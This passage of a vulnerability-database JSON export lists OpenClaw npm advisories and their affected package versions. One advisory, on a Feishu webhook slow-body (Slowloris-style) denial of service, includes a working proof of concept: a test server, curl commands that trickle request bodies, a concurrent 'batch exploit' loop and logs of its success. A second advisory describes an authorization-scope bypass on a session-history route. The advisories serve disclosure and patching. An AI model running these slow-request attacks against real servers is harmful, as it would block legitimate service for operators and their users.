3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2767-2q9v-9326"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110264?format=json","purl":"pkg:npm/openclaw@2026.4.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerabil
ity":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12"}],"aliases":["CVE-2026-43526","GHSA-2767-2q9v-9326"],"risk_score":3.8,"exploitability":"0.5","weighted_severity":"7.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9kgh-wj9w-ykff"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90871?format=json","vulnerability_id":"VCID-9pj9-7b12-jbea","summary":"OpenClaw has incomplete Fix for CVE-2026-32011: Feishu Webhook Pre-Auth Body Parsing DoS (Slow-Body / Slowloris Variant)\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n# Advisory Details\n\n**Title**: Incomplete Fix for CVE-2026-32011: Feishu Webhook Pre-Auth Body Parsing DoS (Slow-Body / Slowloris Variant)\n\n**Description**:\n\n### Summary\n\nThe patch for CVE-2026-32011 tightened pre-auth body parsing limits (from 1MB/30s to 64KB/5s) across several webhook handlers. However, the **Feishu extension's webhook handler** was not included in the patch and still accepts request bodies with the old permissive limits (1MB body, 30-second timeout) **before** verifying the webhook signature. 
An unauthenticated attacker can exhaust server connection resources by sending concurrent slow HTTP POST requests to the Feishu webhook endpoint.\n\n### Details\n\nIn `extensions/feishu/src/monitor.ts`, the webhook HTTP handler uses `installRequestBodyLimitGuard` with permissive limits at lines 276-278:\n\n```typescript\nconst FEISHU_WEBHOOK_MAX_BODY_BYTES = 1024 * 1024;    // 1MB (line 26)\nconst FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30_000;         // 30s (line 27)\n\n// ... in monitorWebhook(), line 276-278:\nconst guard = installRequestBodyLimitGuard(req, res, {\n  maxBytes: FEISHU_WEBHOOK_MAX_BODY_BYTES,    // 1MB\n  timeoutMs: FEISHU_WEBHOOK_BODY_TIMEOUT_MS,  // 30s\n  responseFormat: \"text\",\n});\n```\n\nThe body guard is installed at line 276 **before** the request reaches the Lark SDK's `adaptDefault` webhook handler (line 284), which performs signature verification. This means:\n\n1. Any unauthenticated HTTP POST is accepted\n2. The server waits up to 30 seconds for the body to arrive\n3. Each connection can buffer up to 1MB\n4. Authentication only happens after the body is fully read\n\nThe patched handlers (Mattermost, MSTeams, Google Chat, etc.) 
now use tight pre-auth limits:\n```typescript\nconst PREAUTH_MAX_BODY_BYTES = 64 * 1024;     // 64KB\nconst PREAUTH_BODY_TIMEOUT_MS = 5_000;         // 5s\n```\n\nThe Feishu extension was missed because it resides in `extensions/feishu/` (a plugin workspace) rather than in the core `src/` directory.\n\n**Attack chain:**\n```\n[Attacker sends slow HTTP POST to /feishu/events]\n  → Rate limit check: passes (under 120 req/min)\n  → Content-Type check: application/json, passes\n  → installRequestBodyLimitGuard(1MB, 30s): installed\n  → Body trickles at 1 byte/sec for 30 seconds\n  → × 50 concurrent connections = connection exhaustion\n  → Legitimate Feishu webhook deliveries blocked\n```\n\n### PoC\n\n**Prerequisites:** Docker installed.\n\n**Step 1:** Create a minimal test server reproducing the vulnerable body parsing:\n\n```bash\ncat > /tmp/feishu_webhook_server.js << 'EOF'\nconst http = require(\"http\");\nconst VULN_TIMEOUT = 30_000;   // Vulnerable: 30s (same as Feishu handler)\nconst PATCH_TIMEOUT = 5_000;   // Patched: 5s (what it should be)\n\nfunction bodyGuard(req, res, timeoutMs) {\n  let done = false;\n  const timer = setTimeout(() => {\n    if (!done) { done = true; res.statusCode = 408; res.end(\"Request body timeout\"); req.destroy(); }\n  }, timeoutMs);\n  req.on(\"end\", () => { done = true; clearTimeout(timer); });\n  req.on(\"close\", () => { done = true; clearTimeout(timer); });\n}\n\nhttp.createServer((req, res) => {\n  if (req.url === \"/healthz\") { res.end(\"OK\"); return; }\n  if (req.method !== \"POST\") { res.writeHead(405); res.end(); return; }\n  const timeout = req.url === \"/feishu/events\" ? 
VULN_TIMEOUT : PATCH_TIMEOUT;\n  console.log(`[${req.url}] +conn`);\n  bodyGuard(req, res, timeout);\n  res.on(\"finish\", () => console.log(`[${req.url}] -conn`));\n}).listen(3000, () => console.log(\"Listening on :3000\"));\nEOF\nnode /tmp/feishu_webhook_server.js &\nsleep 1\n```\n\n**Step 2:** Verify the vulnerability — slow body holds connection for the full timeout:\n\n```bash\n# Vulnerable endpoint: connection stays open for ~10 seconds (max 30s)\ntime (echo -n '{\"t\":\"'; sleep 10; echo '\"}') | \\\n  curl -s -o /dev/null -w \"status: %{http_code}\\n\" \\\n  -X POST http://localhost:3000/feishu/events \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Content-Length: 65536\" \\\n  --data-binary @- --max-time 35\n\n# Patched endpoint: connection terminated after ~5s\ntime (echo -n '{\"t\":\"'; sleep 10; echo '\"}') | \\\n  curl -s -o /dev/null -w \"status: %{http_code}\\n\" \\\n  -X POST http://localhost:3000/patched/events \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Content-Length: 65536\" \\\n  --data-binary @- --max-time 35\n```\n\n**Step 3:** Batch exploit — 10 concurrent slow connections:\n\n```bash\nfor i in $(seq 1 10); do\n  (echo -n 'A'; sleep 15) | \\\n    curl -s -o /dev/null -X POST http://localhost:3000/feishu/events \\\n    -H \"Content-Type: application/json\" \\\n    -H \"Content-Length: 65536\" \\\n    --data-binary @- --max-time 35 &\ndone\nwait\n```\n\n### Log of Evidence\n\n**Exploit result (vulnerable /feishu/events):**\n```\n=== Feishu Webhook Pre-Auth Slow-Body DoS ===\nTarget: localhost:3000/feishu/events\nConcurrent connections: 10\n\n  [conn-0] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-1] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-2] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-3] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-4] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-5] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-6] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-7] held open 
for 15.0s (15B sent) [SUCCESS]\n  [conn-8] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-9] held open for 15.0s (15B sent) [SUCCESS]\n\n=== Results ===\nConnections held open (SUCCESS): 10/10\n[SUCCESS] Pre-auth slow-body DoS confirmed!\n```\n\n**Control result (patched /patched/events with 5s timeout):**\n```\n=== CONTROL: Patched Webhook Body Limits (64KB/5s) ===\nTarget: localhost:3000/patched/events\n\n  [conn-0] RESET after 8.0s (8B)\n  [conn-1] RESET after 8.0s (8B)\n  ...\n  [conn-9] RESET after 8.0s (8B)\n\nAvg connection hold time: 8.0s (5s timeout + stagger delay)\n```\n\n**Server-side Docker logs confirming the discrepancy:**\n```\n[feishu-vulnerable] +conn (active: 1)\n[feishu-vulnerable] +conn (active: 10)  ← No disconnections during 15s attack\n[patched-control] +conn (active: 20)\n[patched-control] -conn after 5.0s (active: 19)  ← ALL terminated at 5s\n[patched-control] -conn after 5.0s (active: 10)\n```\n\n### Impact\n\nAn unauthenticated attacker can cause a **Denial of Service** against any OpenClaw instance running the Feishu channel in webhook mode. The Feishu webhook endpoint must be publicly accessible for Feishu to deliver webhooks, so the attacker can directly target it.\n\nWith ~50 concurrent slow HTTP connections (each trickling 1 byte/second), the attacker can:\n- Exhaust the server's connection handling capacity for 30 seconds per wave\n- Block legitimate Feishu webhook deliveries (messages not reaching the bot)\n- Consume up to 50MB of memory (50 × 1MB buffer) per attack wave\n\nThe attack is trivial — it only requires sending slow HTTP POST requests. 
No valid Feishu webhook signature or any other credentials are needed.\n\n### Affected products\n- **Ecosystem**: npm\n- **Package name**: openclaw\n- **Affected versions**: <= 2026.2.22\n- **Patched versions**: None at the time of the original report; the note at the top of this advisory states the fix shipped in OpenClaw 2026.3.24, so releases before 2026.3.24 should be treated as affected\n\n### Severity\n- **Severity**: Medium\n- **Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n\n### Weaknesses\n- **CWE**: CWE-400: Uncontrolled Resource Consumption\n\n### Occurrences\n\n| Permalink | Description |\n| :--- | :--- |\n| [https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L26-L27](https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L26-L27) | Permissive body limit constants: `FEISHU_WEBHOOK_MAX_BODY_BYTES = 1024 * 1024` (1MB) and `FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30_000` (30s) — should be 64KB/5s to match the CVE-2026-32011 patch. |\n| [https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L276-L280](https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L276-L280) | `installRequestBodyLimitGuard` call in `monitorWebhook()` using the permissive constants — this guard runs before authentication (the Lark SDK handler at line 284). 
|","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35665","reference_id":"","reference_type":"","scores":[{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29524","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29454","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29487","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35665"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w6m8-cqvj-pg5v","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:57:19Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w6m8-cqvj-pg5v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35665","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"c
vssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35665"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-feishu-webhook-pre-auth-body-parsing","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:57:19Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-feishu-webhook-pre-auth-body-parsing"},{"reference_url":"https://github.com/advisories/GHSA-w6m8-cqvj-pg5v","reference_id":"GHSA-w6m8-cqvj-pg5v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w6m8-cqvj-pg5v"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x4vp-4235-65hg","reference_id":"GHSA-x4vp-4235-65hg","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x4vp-4235-65hg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-
f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-
6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-
8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-
5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-
wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35665","GHSA-w6m8-cqvj-pg5v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9pj9-7b12-jbea"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91302?format=json","vulnerability_id":"VCID-9uyu-y9qv-u7e1","summary":"OpenClaw: Gateway HTTP Session History Route Bypasses Operator Read Scope\n## Summary\n\nGateway HTTP Session History Route Bypasses Operator Read Scope\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nThe HTTP `/sessions/:sessionKey/history` route previously authenticated bearer tokens but skipped the same `operator.read` check used by `chat.history` over WebSocket. 
Commit `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea` makes HTTP callers declare operator scopes and rejects history reads that do not include `operator.read`.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea`.\n\n## Fix Commit(s)\n\n- `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35657","reference_id":"","reference_type":"","scores":[{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08981","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08979","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08998","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35657"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1c45123231516fa50f8cf8522ba5ff2fb2ca7aea","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI: